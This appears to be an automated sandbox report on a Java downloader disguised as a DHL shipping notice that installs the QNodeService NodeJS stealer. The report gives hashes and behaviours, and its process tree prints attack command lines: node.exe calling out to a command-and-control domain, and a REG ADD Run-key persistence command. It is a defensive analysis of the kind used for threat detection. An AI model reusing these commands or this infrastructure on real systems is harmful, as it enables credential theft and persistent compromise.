Analysis
- max time kernel: 58s
- max time network: 128s
- platform: windows10_x64
- resource: win10v200722
- submitted: 16-10-2020 10:54
Static task: static1
Behavioral task: behavioral1
- Sample: DHL Notification DHL_AWB_0011179303 ETD.jar
- Resource: win7
Behavioral task: behavioral2
- Sample: DHL Notification DHL_AWB_0011179303 ETD.jar
- Resource: win10v200722
General
- Target: DHL Notification DHL_AWB_0011179303 ETD.jar
- Size: 249KB
- MD5: 51dc82e81caca8221a80c68aabf06596
- SHA1: 0e0e7c82b36f7240d7677bf2c12d8750d22e5542
- SHA256: c7e2b03baae34026d8993fd56a55511a7d8ec99e784aba042d5e89fd404f7d98
- SHA512: cfd75246ad15c7260a373ff6b781e31c599064dbb40ee1c77be5a32deb2c46c80b7b52476c71c31cf205ce4c07697e11a90afe6b26c6d06d87392a1e489b7dde
Malware Config
Signatures
- QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.

- Executes dropped EXE (3 IoCs)
  pid  | Process
  3776 | node.exe
  3400 | node.exe
  2212 | node.exe

- Loads dropped DLL (6 IoCs)
  pid  | Process
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe

- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

- Adds Run key to start application (2 TTPs, 2 IoCs)
  description     | ioc | Process
  Key created     | \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Software\Microsoft\Windows\CurrentVersion\Run\9d660ebe-4a21-4c24-a08e-65de984ef859 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe

- JavaScript code in executable (3 IoCs)
  resource                                      | yara_rule
  behavioral2/files/0x000100000001adc3-168.dat  | js
  behavioral2/files/0x000100000001adc3-172.dat  | js
  behavioral2/files/0x000100000001adc3-176.dat  | js

- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  21   | wtfismyip.com
  22   | wtfismyip.com

- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description       | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe

- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid  | Process
  3776 | node.exe
  3776 | node.exe
  3776 | node.exe
  3776 | node.exe
  3400 | node.exe
  3400 | node.exe
  3400 | node.exe
  3400 | node.exe
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe
  2212 | node.exe

- Suspicious use of WriteProcessMemory (12 IoCs)
  description                       | pid  | Process   | procid_target
  PID 3076 wrote to memory of 2196  | 3076 | java.exe  | 74
  PID 3076 wrote to memory of 2196  | 3076 | java.exe  | 74
  PID 2196 wrote to memory of 3776  | 2196 | javaw.exe | 78
  PID 2196 wrote to memory of 3776  | 2196 | javaw.exe | 78
  PID 3776 wrote to memory of 3400  | 3776 | node.exe  | 80
  PID 3776 wrote to memory of 3400  | 3776 | node.exe  | 80
  PID 3400 wrote to memory of 2212  | 3400 | node.exe  | 81
  PID 3400 wrote to memory of 2212  | 3400 | node.exe  | 81
  PID 2212 wrote to memory of 3484  | 2212 | node.exe  | 83
  PID 2212 wrote to memory of 3484  | 2212 | node.exe  | 83
  PID 3484 wrote to memory of 3640  | 3484 | cmd.exe   | 84
  PID 3484 wrote to memory of 3640  | 3484 | cmd.exe   | 84
Processes
- [1] C:\ProgramData\Oracle\Java\javapath\java.exe
  Command line: java -jar "C:\Users\Admin\AppData\Local\Temp\DHL Notification DHL_AWB_0011179303 ETD.jar"
  PID: 3076
  - Suspicious use of WriteProcessMemory
  - [2] C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
    Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\6630fbc2.tmp
    PID: 2196
    - Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\node-v14.12.0-win-x64\node.exe
      Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain severdops.ddns.net
      PID: 3776
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      - [4] C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BK6MhJ\boot.js --hub-domain severdops.ddns.net
        PID: 3400
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        - [5] C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_BK6MhJ\boot.js --hub-domain severdops.ddns.net
          PID: 2212
          - Executes dropped EXE
          - Loads dropped DLL
          - Checks processor information in registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9d660ebe-4a21-4c24-a08e-65de984ef859" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
            PID: 3484
            - Suspicious use of WriteProcessMemory
            - [7] C:\Windows\system32\reg.exe
              Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9d660ebe-4a21-4c24-a08e-65de984ef859" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
              PID: 3640
              - Adds Run key to start application